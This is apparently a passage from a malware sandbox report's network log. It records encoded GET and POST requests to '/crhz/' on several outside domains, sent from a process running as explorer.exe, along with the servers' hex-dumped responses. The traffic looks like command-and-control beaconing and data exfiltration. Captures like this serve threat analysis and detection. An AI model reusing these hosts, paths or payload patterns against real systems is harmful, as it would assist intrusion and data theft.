31 67 6d 6c 51 4b 4a 79 47 34 39 34 76 32 75 39 59 30 52 79 2d 66 4b 67 71 6e 75 75 38 64 46 72 51 6a 63 52 39 4c 36 44 6d 55 41 67 Data Ascii: Mkn=gknP8NpQx3TQ34cKgZmP5wDFo7RpiNb8PSSG1Ou3HtBRxeDtuTv6SF6vB_drRFKPAjZfKu6lVeJkGSgCyp3gIQASt0tcSbmeloj9RyzAeTKlCXZ0Uoi0nUh6tyoB6kbRe0SQy7HckVAdLtRgyC2UXomks-hoLpnWlcDJ3b(7mcuov-wCAteJXAHK7Y8BCW3n(jEvn6uxAVwB8P45eCYNhPOvffqhuksJA7QWzn6QUgLGViGLilukcTA2k1SJyfUaMThWMcCSO4ju6xW0ITp-xbBYt7IoX6OX85oGJe85p9vLwv~DY10LdkkRt0LejpljMc25lV3NaQXAC4fxoFz957NM9nO4ek(-Ly3OGYs-J_A-so13oWuDKHqvw8brxoAamVX58u~V3Di1CEvBa1IQlFJ7~p4uQLhhQnGmKN4Iw-jTBeSpAQZx~eWXueZ8t-PWrmkG4oruabeaf5k4xOzvEslte4ue01pb1r1Cea59g2feZMzLjmJsUc~feOopj095AhNx4F5sGaJqTRmrHiMlFeUNuP0-ua6tLBi7bUS3SqSehKsnQOj4qdYgAwfYU5AXM4EOc16WThW-Is3lG3pO7VX30tzp7YtxqHrLJj8N5Xw8rnONYSSFdFYz4lAR3FZjJ9vR1CschIuG7A1ybos-2dMaVss4vRd5nLBZUoXElxaDafEWz5ljLVCmXOJ2BiYu5H5qKBD3qVSG(8dIqdnBHoQUothxTEUSkCQ8e6U7CwSt02S15gV19j492AufkNeCs09Vnb0-cCQuPRxJ3JoD(651XQnlVbD6Ombqqfbujv4x9qLXf-GLs3od37gAErQMdU1bde1TtrmEKhBYOLGV3Rqt~pJC3i6gtuY7u9KgQ02OOa44qWo7XqJ6R2JfjJzWQvCsSleo8xF1CwheOSxNE7DE4VB0ZXc64wRjSUXAOcRYbkB1mfaMWRJtEtPTEdrKQbbwOC2WydOiBOopu5nW2DTkHxSBh6ri~23gzQbyesWST_vO5JKBhmwgXIlkYAtq8Fzs1Bw7RkRriAMX6Y2vwGFWHMsZQRR_AT4O3vhyr24YWkwUBM67~qk5K2o69dASixEoaHI2zmoCKxaLUAFqK5h1nnNGD_9fwkBA7ZWq(ho82V16DQ4mLd~vz9DJyamQP6koP0oBZ2DbAeiwrQQ4i5lxrVEgR_GVqBOnFSmSFxb1ZMhjpQr8TcvDUKjhZRzPzvz8fDet~CEMrarF6KT3~gV1FnnUv5z7ESNPFo2X9G9U~9Unebb4hfyTjvcZdcz4BThIo5dzjTndJ-RIkEvBFDzLiHuBym8o~321gmlQKJyG494v2u9Y0Ry-fKgqnuu8dFrQjcR9L6DmUAgZvNZU5Q3IeNiyJIE7AwkbPvyXM7Qm5HpY0GlfH2GJ~_kxMtfRNtd7djhrEsTnwdGngUsM1wRnlHpohF9Az2MuOXxmtr(OY90IvoVO8r5uaUP2gfaUrel9ST9rsr4HMH(ZX9lTK9FQh9nBPThPEd9fFw9lQ8IQrgsu9v6BLdsgejR3GoUBRgmAKqVOYvVah6IPOfWjCc4KJCQdiHklsFxhp5YhlSFxqT07LqLUqZbGR0UgIwPggHh0xOn4GQ~oi3VpwAgE7hRZGKvpein32xbcuPGLrV7la9h2UdsTyqVu2b0RBSzMW7qBqcgEagb5Kjq4abrucv1uUoNv(LMBdAliTI~oZERBvJaIbffI3Y7rUfV1waWj5DK4k9nTsB(CIgNJJ31K~k(xX8QHH6RV(o1Uu-4I91YDcjoGNsiP~eZNO05O36JAP37T3ikP610QfMKFyG7uxNG1PAGkwIscTZ5xITcdcf1WQim25i5URod9BHF827Om1VpesioJ8f58GkDQ(IIpZ1(spNT_ErLwmJoHuQmf3SpjU7Max06mBBL81MGMNjFz~lTgwaX1Rtm9KJiVFwa8~yCMOGFk30aHUtj0tlmbEUBpli8Lz-p0T8o2U8Bwxr9BVFNlMcDw8DiC9DQlnS6x6k5GaqMff7gIk3nly5LyH8Wo4qOsZpEbQe54VY~o5AsatrPnzfF9H2jWe9So8N9G~kuIewTTYRZkhTmW~HtQlZlvh9t4w9JtA-7VlA(ITJqb0nOfbGWs6pLUQ7nSuUVz9uRYPtXlR6Tnh9S0aWm9klBJXylm4bFwd1k5KLNEjVmT7ll4D0qc8Wao3_f5Ye5wbl2T4jI0oZZ2ruS2sGuppF5u2-5Mjgeojh0J0tH3bUCokStFN0ZAv6GL0WVyK3kvRNhyPZUDC1z4xmciphMcswE-uN8CCXt42c5X5TZDL77RntWq8tYDDkJbPoSWCmyhnikiHJlPgWrHzn4tIhuvnqtaV-v-YePGKo38lpc3lpuFx7W7fKaASkcSIiq6n_EbClF_KD4VPDqdt6NykFOHw1ASQsVgeHP8tZhoTQfEaLql2d6jmz4_5Gf9m5gihFSmfKLVF1c-q5M6LWr_F2yu(LRhQUSOhvYtcGE1MbrFqjdc0-GVZamblsBSh10PN2aW~oNY2F9vGgxSZ9woAuLuct17qi(xt6OdQ8AnWsk6fx8TR00pLZjeTxxERteojrrhgI6k8mxndk~PEgkfvyQLmpA3CKi025MP4BYFGILg27DJ2e4IpBzYlGUpuhkpglkX78kWy59h9n0GFRenLSEa~GpiQtv5UX2CrdC9aPgJ7_6Hic1DJmPPddi1HZLxjKOPomn58dNcm3fMtCUiATQGpV2MXwdDHA8HOJtk(bdShH7ybxWv5UHaUlWBv524UcO-k7eKj1LrzcCPYpxxrdAKoLB7LOE4dLgnEbV-KUq9DSSyZ2vVwNpPRUz69JGlHQcPm7tc8IBpQnYiCQRg~dPEc7sdPgcwwkskPDGTJmg1zt30Xf3nrR4aj26HFuvVKJwO9OLeGLph~giVxlVCB5mjcDCvRwXoLoux4uCuXeJcVD815fHYIfS-dUcMke9lFYAY1szr~mhuL9pqHNTJ74cKDvI_vIaa1cXy9dxa528aweahNYgr7i3E3Q~cwqNMkam41A29cABtwpDogvognRuRAE25CBTSWmF4p1C8mTyH7hJDXpQsq1l-lSRWG5x_rKFdlRf0~WI1j4HHssdSLwEXPpa5~9jq8wbROuPjv1VoFbtNoosaghYLSvwIzrWJcAQR3aoCahnAjEd3mL(AtVl315qlrnwAvwVxWFFZ~bUHII~eG1b5cgW5r8DWtO2HQJQ1Xf9JmiC-bgjf3HBvCsky7Mh1yhVNA0aLuyGwrw15J2Ai2lzWsBrzcK3IzEcGKKBSAg91RFKxndugQ12gm8iuIYvPADGB6_F58m5lM-7wsbny6zVh8zhOWytOaopopI6xnGN6aHkHbl0XpQqMpjWEC4x3zGHrl1LfDVU7i7(OZfBDiqg-AgSlCehPqE6GjEXBP_NA71zvXNMcTfyXRNu42c5HhlLzyokhzL7cOYA_LImT7jFency1LpS5yRi4AIev9LgU1hAeqNzM(jeOmrk2waX9QpEgTd3tcsGSBHDKVNDEjaKI66RRKP2R2Xsdcij6ZyFAJ1biw7I1bBixUc~zKqBw9TUz~1co21JQqa0hmNXP5-n7T6J2l40X3rLVUoKjKC~QlMJYYXXIeFivYrLun3(Xgg3QULYQZJhUQCOYrqnZqv2_QAVFDRrMawQwZbJLhADJZk~bwU68jxxqSGDVl-BaR0bHdDoj4zHEhokD4B7ALaXA(ggLvyX9h05AP6iygd81fKe9I-UpqwJPXexbr-G-KMbetrl-3o3E4MZOKi~8ztxaL4FhBlDensSGs1uOHZtJtAWKmI7Aj8UQiB~FHsWnJVMOxK1PlFcFYOWg2FaqGLLSencjxSVp9oSiM0KH(zQouByPlTGQ4TbNpnMGxfOedjTPN3u-Zm44FLLYYVi1(0WAjBNuG8zRvPOvgTwaZKy957(gKdVWWmN331vc5bOAklY68a(dUJ6MPOEPIOmOcM38fKK7IhwIzk28d57UoLZQwXM6wbDb0yVGGw0Lg_fkY4ih72lf2b6llQMWsbqG2o9-VbiMvTRSk8sTBEIfdIs_p56re6INRZhnFy0_ZSzhdB~zTn
Jan 25, 2023 13:22:54.666603088 CET	241	IN	HTTP/1.1 301 Moved Permanently location: http://hvlandscapes.biz/crhz/ vary: Accept-Encoding server: DPS/2.0.0-beta+sha-0ec0b2a x-version: 0ec0b2a x-siteid: eu-central-1 set-cookie: dps_site_id=eu-central-1; path=/ date: Wed, 25 Jan 2023 12:22:54 GMT keep-alive: timeout=5 transfer-encoding: chunked connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.3	49719	76.223.105.230	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 25, 2023 13:22:57.196432114 CET	242	OUT	GET /crhz/?Mkn=tmPv/9YflmeFyaovhpy86TX5rNY2iNLCfFTw46C4YL4FjsvtgGKrRmf5O7NIQw/qRR8QJqKEWoluew4y5+XeQGQX6k9pc/6NhQ==&vux=DmStydFUWc8HD HTTP/1.1 Host: www.hvlandscapes.biz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 25, 2023 13:22:57.219901085 CET	242	IN	HTTP/1.1 301 Moved Permanently location: http://hvlandscapes.biz/crhz/?Mkn=tmPv/9YflmeFyaovhpy86TX5rNY2iNLCfFTw46C4YL4FjsvtgGKrRmf5O7NIQw/qRR8QJqKEWoluew4y5+XeQGQX6k9pc/6NhQ==&vux=DmStydFUWc8HD vary: Accept-Encoding server: DPS/2.0.0-beta+sha-0ec0b2a x-version: 0ec0b2a x-siteid: eu-central-1 set-cookie: dps_site_id=eu-central-1; path=/ date: Wed, 25 Jan 2023 12:22:57 GMT keep-alive: timeout=5 transfer-encoding: chunked connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.3	49720	81.169.145.72	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 25, 2023 13:23:02.281580925 CET	244	OUT	POST /crhz/ HTTP/1.1 Host: www.frogair.online Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.frogair.online User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.frogair.online/crhz/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 4d 6b 6e 3d 76 77 30 6a 4e 31 43 6a 39 4c 34 4a 46 6a 35 70 30 64 58 39 36 37 6e 67 77 41 73 7a 7e 66 64 59 6f 67 4e 47 6e 43 46 48 54 49 4f 68 44 34 42 6d 4e 72 46 56 6f 74 4c 36 37 4d 53 34 64 30 32 76 53 66 6e 43 64 4c 36 68 67 6d 34 57 55 4d 63 31 53 67 6c 76 42 47 50 5f 4f 67 49 66 28 50 6b 4a 6c 46 4c 41 46 76 6a 30 6e 36 77 44 49 54 43 59 74 44 66 6f 4f 41 59 58 35 56 65 72 6b 51 76 36 33 64 43 63 62 32 43 51 71 67 6d 47 64 7a 54 71 6a 67 47 32 35 7a 4c 41 7a 32 56 35 63 45 39 34 70 44 39 74 4e 43 37 76 64 61 39 77 6c 6f 36 33 55 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: Mkn=vw0jN1Cj9L4JFj5p0dX967ngwAsz~fdYogNGnCFHTIOhD4BmNrFVotL67MS4d02vSfnCdL6hgm4WUMc1SglvBGP_OgIf(PkJlFLAFvj0n6wDITCYtDfoOAYX5VerkQv63dCcb2CQqgmGdzTqjgG25zLAz2V5cE94pD9tNC7vda9wlo63UA).
Jan 25, 2023 13:23:02.302560091 CET	244	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Jan 2023 12:23:02 GMT Server: Apache/2.4.54 (Unix) Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49703	185.151.199.52	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 25, 2023 13:21:57.914727926 CET	140	OUT	POST /crhz/ HTTP/1.1 Host: www.n-r-eng.com Connection: close Content-Length: 5333 Cache-Control: no-cache Origin: http://www.n-r-eng.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.n-r-eng.com/crhz/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 4d 6b 6e 3d 44 30 56 48 4d 42 42 4d 49 71 41 79 79 70 75 67 52 37 39 5a 6a 74 71 54 76 69 6c 78 36 36 32 5f 34 4f 45 5a 70 76 4e 45 41 58 49 6c 46 64 70 39 46 41 32 64 7a 36 64 69 42 48 68 6c 70 45 46 48 56 63 47 6b 4b 73 55 74 71 42 5a 5a 65 33 30 72 41 58 6d 39 78 65 41 78 46 52 75 6a 34 4b 46 32 59 5a 67 34 42 2d 78 43 42 31 6f 4a 45 32 50 79 35 34 76 5f 78 64 68 53 68 75 73 50 6b 39 65 69 75 53 6d 70 73 70 4d 51 49 7a 39 73 59 44 70 47 4b 56 4a 47 6f 2d 4a 7a 39 4a 46 72 51 42 4b 30 50 70 77 6d 50 4a 47 65 46 47 47 6f 6f 35 46 58 47 51 7a 5a 55 4d 56 37 38 75 55 74 4a 45 6d 74 36 69 7e 77 77 52 39 2d 55 6c 6f 69 36 61 50 70 76 6c 4d 47 66 4e 68 39 61 66 6a 47 62 4a 78 5a 56 39 4b 57 63 4a 6c 61 6f 77 69 65 38 62 42 59 7e 36 70 46 62 4d 55 57 78 37 4d 74 39 74 4d 64 61 44 76 43 57 79 4c 43 48 33 4b 4f 4f 49 54 47 33 54 35 49 43 31 51 61 35 52 35 33 61 47 54 61 36 48 69 50 43 59 51 6a 6c 6a 6d 6b 7e 68 75 6f 38 69 72 32 47 42 6d 5f 42 45 49 44 70 6b 30 50 58 43 37 79 48 43 6b 38 7a 31 6e 7a 6a 5f 45 75 65 37 49 78 78 32 31 73 74 6a 71 68 57 6d 41 47 7a 72 74 65 57 36 6c 35 6f 66 32 67 36 2d 56 65 66 30 55 34 66 78 44 5f 58 69 68 31 48 76 41 6d 36 39 52 46 73 41 31 4e 50 67 54 58 6b 7a 74 51 6b 46 28 48 69 32 64 44 46 34 6f 33 6d 7a 70 7a 5a 62 75 34 78 36 50 65 4e 7a 44 55 54 4a 57 38 37 55 46 36 53 79 72 32 78 49 50 65 37 46 47 52 57 41 70 78 4b 70 33 6e 4b 71 6d 4b 71 54 52 4d 33 52 6c 5f 70 54 62 70 68 43 76 6d 59 41 73 69 73 7a 64 46 6b 72 54 61 71 52 55 4b 43 69 53 53 4f 57 62 35 5a 69 4d 2d 6f 74 74 7a 43 73 32 56 68 66 38 56 65 71 52 35 4e 44 70 33 39 35 52 77 7a 35 53 6d 6d 68 74 30 7a 71 4b 38 51 6d 51 4a 45 55 6f 2d 46 43 68 5f 58 6c 6f 71 41 38 69 4d 66 74 39 63 31 44 68 5f 67 30 63 41 39 74 35 5a 55 46 35 5a 58 72 6d 38 45 55 46 63 30 62 65 39 55 48 42 44 63 71 45 41 56 36 30 45 57 77 75 75 7e 69 33 49 32 76 6d 4e 39 4b 66 5a 59 6e 6b 61 57 67 54 5a 4d 6d 76 72 4b 5a 75 48 55 48 73 48 4f 33 4d 50 7a 75 77 38 34 70 4b 34 4a 63 35 62 73 76 6d 76 70 77 59 78 5a 32 50 47 59 55 52 78 4c 51 41 42 47 57 45 6e 48 78 4e 6f 51 78 75 53 43 39 33 65 4d 42 6a 75 7e 46 57 6a 59 57 38 65 4b 46 51 6d 67 56 74 33 52 53 78 55 32 71 7e 47 33 4f 79 79 78 6f 6e 59 70 34 55 39 6b 70 45 4e 59 5a 43 34 55 78 44 7a 69 30 65 4c 45 5f 59 56 35 74 46 59 6a 72 52 32 54 5f 30 49 56 51 39 35 4c 57 35 69 57 72 59 32 56 6a 71 6a 33 42 38 30 6a 7a 70 6b 67 6f 65 78 32 41 42 63 65 54 74 71 4f 79 4e 55 6c 46 48 5f 6e 46 61 71 33 46 4b 58 56 66 4b 79 59 78 49 58 76 5a 72 56 48 6b 66 49 32 61 70 59 61 75 74 66 43 32 44 4d 34 52 47 50 46 58 4e 52 77 73 39 39 44 72 44 59 4b 6c 58 38 7e 5f 73 45 6b 53 67 61 4d 38 5a 57 62 6d 46 6c 4b 6a 28 47 37 53 55 32 32 30 76 54 39 4b 76 5f 65 6c 35 67 58 6e 64 69 64 44 5a 73 7e 74 44 66 53 51 74 6b 79 6a 4a 74 4f 56 35 5f 78 69 4c 4d 6a 5f 4b 78 51 7a 32 4e 4a 54 36 33 4e 50 48 44 35 5f 48 48 49 48 7a 7a 5a 67 55 75 74 78 6b 53 6b 6c 6e 57 64 5a 36 39 37 6f 66 4a 34 77 63 41 64 68 6a 54 6a 41 77 52 57 4c 35 71 62 34 6f 43 70 4b 67 78 30 78 73 48 4b 70 45 55 38 37 77 37 37 33 32 57 41 67 4e 57 56 5a 28 4f 67 6b 38 51 34 6a 53 62 44 32 4b 4b 39 41 5a 57 6e 33 6b 39 5a 48 77 46 56 44 59 66 50 78 42 2d 33 6b 44 42 64 52 67 48 72 54 47 4f 46 55 73 53 48 77 67 45 74 4a 4d 7a 33 48 58 2d 33 64 32 38 34 6e 66 5a 47 6e 47 6e 5a 54 57 6d 54 78 48 36 36 54 4f 4a 74 67 54 44 69 6d 52 64 64 6c 73 39 6c 36 6e 46 6f 4d 62 48 68 56 6f 39 44 6e 79 47 49 65 42 47 63 59 43 42 46 4b 79 50 64 41 6e 6d 77 44 7a 74 42 51 4a 5a 53 4e 73 49 4d 53 72 79 36 45 6d 58 6c 38 4b 32 4d 45 72 75 41 5f 73 6a 47 53 62 58 63 5f 4c 46 56 6d 64 69 37 4c 5a 42 4e 48 6b 32 50 52 65 63 42 4e 39 69 49 32 37 37 31 30 45 79 33 31 73 41 67 57 4b 43 53 32 75 2d 46 49 7a 65 6c 76 4c 48 4f 47 4d 74 78 30 5a 78 71 56 75 4a 78 61 5a 74 45 5a 78 6f 70 37 53 36 73 54 77 43 56 45 51 37 43 54 43 36 30 6f 4b 64 72 41 37 77 34 6c 4a 76 45 52 71 5a 75 48 31 62 71 70 78 72 73 54 59 51 6f 41 51 5a 6d 30 75 57 66 5a 47 41 50 58 38 5a 44 58 70 77 43 30 6c 53 52 51 73 31 4b 6e 56 5a 54 48 74 62 64 50 39 5f 70 7a 4e 59 68 46 30 36 4a 6a 72 77 67 54 66 66 6b 47 61 Data Ascii: Mkn=D0VHMBBMIqAyypugR79ZjtqTvilx662_4OEZpvNEAXIlFdp9FA2dz6diBHhlpEFHVcGkKsUtqBZZe30rAXm9xeAxFRuj4KF2YZg4B-xCB1oJE2Py54v_xdhShusPk9eiuSmpspMQIz9sYDpGKVJGo-Jz9JFrQBK0PpwmPJGeFGGoo5FXGQzZUMV78uUtJEmt6i~wwR9-Uloi6aPpvlMGfNh9afjGbJxZV9KWcJlaowie8bBY~6pFbMUWx7Mt9tMdaDvCWyLCH3KOOITG3T5IC1Qa5R53aGTa6HiPCYQjljmk~huo8ir2GBm_BEIDpk0PXC7yHCk8z1nzj_Eue7Ixx21stjqhWmAGzrteW6l5of2g6-Vef0U4fxD_Xih1HvAm69RFsA1NPgTXkztQkF(Hi2dDF4o3mzpzZbu4x6PeNzDUTJW87UF6Syr2xIPe7FGRWApxKp3nKqmKqTRM3Rl_pTbphCvmYAsiszdFkrTaqRUKCiSSOWb5ZiM-ottzCs2Vhf8VeqR5NDp395Rwz5Smmht0zqK8QmQJEUo-FCh_XloqA8iMft9c1Dh_g0cA9t5ZUF5ZXrm8EUFc0be9UHBDcqEAV60EWwuu~i3I2vmN9KfZYnkaWgTZMmvrKZuHUHsHO3MPzuw84pK4Jc5bsvmvpwYxZ2PGYURxLQABGWEnHxNoQxuSC93eMBju~FWjYW8eKFQmgVt3RSxU2q~G3OyyxonYp4U9kpENYZC4UxDzi0eLE_YV5tFYjrR2T_0IVQ95LW5iWrY2Vjqj3B80jzpkgoex2ABceTtqOyNUlFH_nFaq3FKXVfKyYxIXvZrVHkfI2apYautfC2DM4RGPFXNRws99DrDYKlX8~_sEkSgaM8ZWbmFlKj(G7SU220vT9Kv_el5gXndidDZs~tDfSQtkyjJtOV5_xiLMj_KxQz2NJT63NPHD5_HHIHzzZgUutxkSklnWdZ697ofJ4wcAdhjTjAwRWL5qb4oCpKgx0xsHKpEU87w7732WAgNWVZ(Ogk8Q4jSbD2KK9AZWn3k9ZHwFVDYfPxB-3kDBdRgHrTGOFUsSHwgEtJMz3HX-3d284nfZGnGnZTWmTxH66TOJtgTDimRddls9l6nFoMbHhVo9DnyGIeBGcYCBFKyPdAnmwDztBQJZSNsIMSry6EmXl8K2MEruA_sjGSbXc_LFVmdi7LZBNHk2PRecBN9iI27710Ey31sAgWKCS2u-FIzelvLHOGMtx0ZxqVuJxaZtEZxop7S6sTwCVEQ7CTC60oKdrA7w4lJvERqZuH1bqpxrsTYQoAQZm0uWfZGAPX8ZDXpwC0lSRQs1KnVZTHtbdP9_pzNYhF06JjrwgTffkGaIBXkzLci-CFzdVAXEunyUv1jOj0AY0Kn8ufwS93CHJM1mJ1jnWppOKjCUHeEUO2FFi7(Vv082j-b1da4_PG5cC7PQDMG7lKJGy0Ck5-OC(dNNNQpBTlbsu_6opNPOtRcL~DBeO91gi-7MeRaTs-yo2cUWzhbvqpg1nFulLoMSt5YuBW110V(TcjxPMM7sfNCSeVe9Jicevvm-tRcdmlLdlNHyiL~gPepoADLMkzhQu_wU53Np~UgOJG5i0YiwsaMRzCP2AxagUH2IEkK68C1au4ii(pc_SdoHU_nLz-qzxbo2Cb~JkzA_Kv5sPbl8qlOBGdXXELr3agT5JlZLzWmEavU723as1tYNSNb5iPkiWraoSoUukby3jmON6OpMaTjNKuYVd46dPtgx4u7JeeJB0SDxZHoxP6PwhoL3zthO2iQlIGJF1u0-FK552zhvfNYgmuzwYfXESVp63M9ONNZagZGuaJwTIv7MGnLmZlziuymys0jtfImXe1MY6AeYbFIgovW8BWwHJ8~4Joi3wFAlveXG63bPbWeadQiALt(11qk2G8UozmodxsVh29TB(LvGxYtLgSHSj5hkLmnG1DRUS6pPKNrR2dBL07Urtn20Y-doKlmJfNOMnq0dyemT04WK~1r4Fm4e(17i0J~hxcvSQ4UjvnvJC6csfdk2Wpeb1NxfCnTvvWJki1Y4X1IxDnXN4v8KmOCQ0wXEdkULaQTwtr5Jjh3iIFadqAtETQFw6XvMe-Uw7p4VQU0SxxcEqW9rn-(qOxjkbsReKKKPFT(7AWku8ssEYlRFJRfwhR8scoSdD-4Kag(q2jBy5buVZFIyOJqkSn6FHVvs44dD30KSPIfwONbs(4B3Hp4cHHS-MPb-kCUPCNdjnn2JSGXjLmvv8JeDcV6oh0zcZxupZLZzxeVP2wKBvAL8R5Z2hTW3OYG-lDEH~ndAUnoluWRBFIBRqJiRfrBSdUkfW7OcFMxMeVG6vtupoz2VI_MaY3ASYQdboyMiQo5Wtmg7dHrYdkaT1fkc(7wd6oiysFCKhb1VaoyTCOY7ogMu2VnNB_7Kw2NcgAdKtHLYwVgi~SFyXIYYfTdQeTg03PC7a3vo8Iio4J~yt7hJky~dxFEsZhjrjTK3iSYPlEOiIpX_F-JeYQhgA8WZW5wU1h4V3FCIDY0TTi8LQ_Mrc8PiSISgW6ifTai7GU8LIMahzVh6D8uSIoyV5Wt2Rhg-5wjIU97Y4HwEGaEzrDC83AoQX1C54W7UZfHdiF0Ogypz8C2c9EtdcaET2Cu05vIncKWPFZDGQz1vUX40(2OZ86buwIguQDY6FFHxj8khnq5xOQMTKUlSkXx9PakTi8nUtRTXCVZb81RDSJ(LUwookfk0kHqAdKPLmVU1QkWAp2U2sNnQZiA1DcVpZu57h84AiStEYqoU3Rc6(TIaaV7ze0I4iJ9fhpFwYouKGoAFYOEjHg~_LOgAKaWMi2AbDsmaECrFrMAKK7xpF5MEHhoRsDJRDLwbN6W5SE8FNNsuxl(dABbX0npBaiNCZ6BlUIOAh98gwdqHtge0mevpNdzhUHnrgHylC5xM4jheu_VKgDi15ycgjbq5MnYu01neB13ysjUx0fOlchBLzbOrFFs3a3ghyIWl4KNo1blbL1(vsZ~MDhqKA5s-oW7QIYFLHo~6ZdAFNjar0OgUY2MzfQZJexF9IB2s5jDdc2QjzKWlyIEZkSOnSoTN0jOZRdHmUi85w0ARPFOgWzvBvp~GHzqN~lSSU3dmPpyo15dBNlMC1CS8dwWamEuEz-YPjQe7UWDV3nDOYnceR3dTVUMSiTqId3JcRNuLuJVVsrZA8CV1VpPx5HEEe40dNsPx~8uyOBJsVRaBRb5wn7JTXKA3Toxyem79nKa3yt2SQqKf3wCRmDL3j1yI2_~tkDRP85KVh3fBYoaW23dLs7w0InLcaxmJC6BqUAVcaNKDNDQmAgDCP6bMyDdmefLhWKwYb18PZBskr4mFQOfujzlhMv06C1FESttMkpLMqw0ZaZ8vegHtNwzbpVv7QXJzSV0h9n9phc(nRtH_RDWgUC9wNoJLTrawTaouPP~e9NSrdH~sE48W1aCTKUogD7pGeh7fb4rmJMdNRdQbocm1PA(RsTxo8TmiwSh5~D2ZF4G6(zDbikWhBYUUPz18BKQA6wseruFg9k3-byzwwOkzLwjwCYzpHIiHPzvz7_vXBzZ-dsycMD~b9l(RJfk0D3ccGCZnkg4AUIKbG4y6kehhpKgZqkHwNwmoxQc52kJiwYLAxfCeROJQYQGJq2viNvXUUvwnEFpnbMYOtiDriqv9CGqDRMwtlUydjRfyTwNN~YsxIrgBwtMvObYiSUtcqsuXEQuF(RPLTUcO5OgJsOGCbaLHzXcwIw4RLC0SW68Yv2cDbqtnmPP6cD6KTw7I0eYJoKh3CAATBt87AMB8R1gYxZbXHnLK(C~NJGSf96AH8LBrOhzhojreUnYkTGlPsAHPdQligV386Rt1H8OO1_9gnZ9Z6oVJ7NsqEvIW7-u6CRtSSSMaSC7tIypxNLpr8mt9OiPDfb5RpPiwfYupuP9bn5Ef50lj8CUHR8H1X9HlckpAGNj_nvdDe1qZzIieuR6ss2Hi5LWkMnHvw8UV9VcGru0qgRtbQhhs4N2F8MehrX8VeQTedTgKMFQDtSj0WRg8xoIq5gSyQwPbBWr-p1h6yE~a4cQws6~W0XFshL
Jan 25, 2023 13:21:59.122298002 CET	141	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 25 Jan 2023 12:21:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 18399 Connection: close Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://n-r-eng.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding,User-Agent Content-Encoding: gzip Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed bd eb 76 e3 c6 b1 30 fa db f3 14 18 ce ce 8c 14 13 10 ae bc 48 a3 71 62 c7 ce f6 39 be 2d db 49 be 6f 79 bc b4 40 a0 49 62 04 02 0c 00 ea 32 1a ad 75 de e0 38 b1 bd 93 ac 64 67 27 59 f9 76 bc fd 42 fa 7f 9e e4 54 55 37 80 06 09 f0 22 71 6e b6 c6 16 09 76 57 57 55 57 57 57 55 5f f1 f0 ae 1f 7b d9 f9 94 29 e3 6c 12 3e ba f3 10 bf 14 3f 48 0e 5b 49 16 b6 94 d0 8d 46 87 ad 31 53 df ff a0 85 b9 cc f5 1f dd 79 e3 e1 84 65 ae e2 8d dd 24 65 d9 61 eb 57 9f bf a7 f6 20 fb 0d 91 11 b9 13 76 d8 3a 09 d8 e9 34 4e b2 96 e2 c5 51 c6 22 00 3c 0d fc 6c 7c e8 b3 93 c0 63 2a fd 68 2b 41 14 64 81 1b aa a9 e7 86 ec d0 40 34 0f c3 20 3a 56 12 16 1e b6 a6 49 3c 0c 42 d6 52 c6 09 1b 02 23 59 36 4d f7 f7 f6 46 93 e9 48 8b 93 d1 de d9 30 da 33 78 a1 92 f4 83 24 1e c4 59 fa a0 20 fc 20 8a 83 c8 67 67 6d 65 18 87 61 7c fa 40 d9 7b 74 07 8a dc 55 55 e5 f3 71 90 2a 69 90 31 05 be e3 69 16 4c 82 a7 cc 57 4e 83 6c ac 64 63 a6 fc ef d8 4d 33 e5 b3 77 3f 56 a6 e1 6c 14 44 ca 89 a9 6b ba a2 2a 39 2f e7 08 a0 79 f1 64 ef 34 4e fc 69 c2 d2 74 8f 83 a6 7b 29 8b f7 14 55 45 f6 b2 20 0b d9 a3 4f dc 11 53 a2 38 03 46 66 91 0f 58 3e 52 3f 55 df 8d 46 0f f7 78 7e 5e 0f a8 f7 94 25 d9 f9 61 2b 1e ed 87 31 ca 46 92 e3 98 1d 41 7b 60 25 ea 